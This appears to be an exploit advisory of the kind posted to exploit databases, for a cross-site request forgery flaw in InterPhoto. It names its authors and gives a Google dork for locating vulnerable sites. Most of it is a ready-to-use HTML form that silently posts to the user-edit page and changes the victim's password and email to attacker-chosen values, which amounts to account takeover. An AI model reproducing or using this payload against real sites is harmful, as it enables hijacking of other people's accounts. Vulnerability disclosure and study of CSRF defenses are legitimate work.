[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+] [+] [+] Exploit Title : InterPhoto CSRF Vulnerability [+] [+] Exploit Author :Und3rgr0unD security team [+] [+] Google Dork : inurl:interphoto?id= [+] [+] Vendor Homepage: http://www.interphoto.es/ [+][+][+][+][+][+][+][+][+][+][+][+][+][+][+] [+]Exploit Code: --> <form method="post" action="http://localhost/mydesk.edit.php"> <input type="hidden" name="action" value="updateuser" /> <input type="hidden" name="password" value="123456789" /> <input type="hidden" name="repassword" value="123456789" /> <input type="hidden" name="email" value="email@x.com" /> <input type="hidden" name="userfullname" value="" /> <input type="hidden" name="usercompany" value="" /> <input type="hidden" name="useraddress" value="" /> <input type="hidden" name="userpostcode" value="" /> <input type="hidden" name="usertel" value="" /> <input type="hidden" name="userfax" value="" /> <input type="hidden" name="useronline" value="" /> <input type="hidden" name="userwebsite" value=""> <input type="submit" value="Submit" /> </form> <!-- [+][+][+][+][+][+][+][+][+][+][+][+][+][+][+] [+] Vulnerable Pages : [+] [+] [HOST]/mydesk.edit.php [+] [+][+][+][+][+][+][+][+][+][+][+][+][+][+][+] [+] Discovered by :bl4ck_mohajem (mohajem.war@gmail.com [+] Special Thanks : Und3rgr0unD security team [+][+][+][+][+][+][+][+][+][+][+][+][+][+][+] -->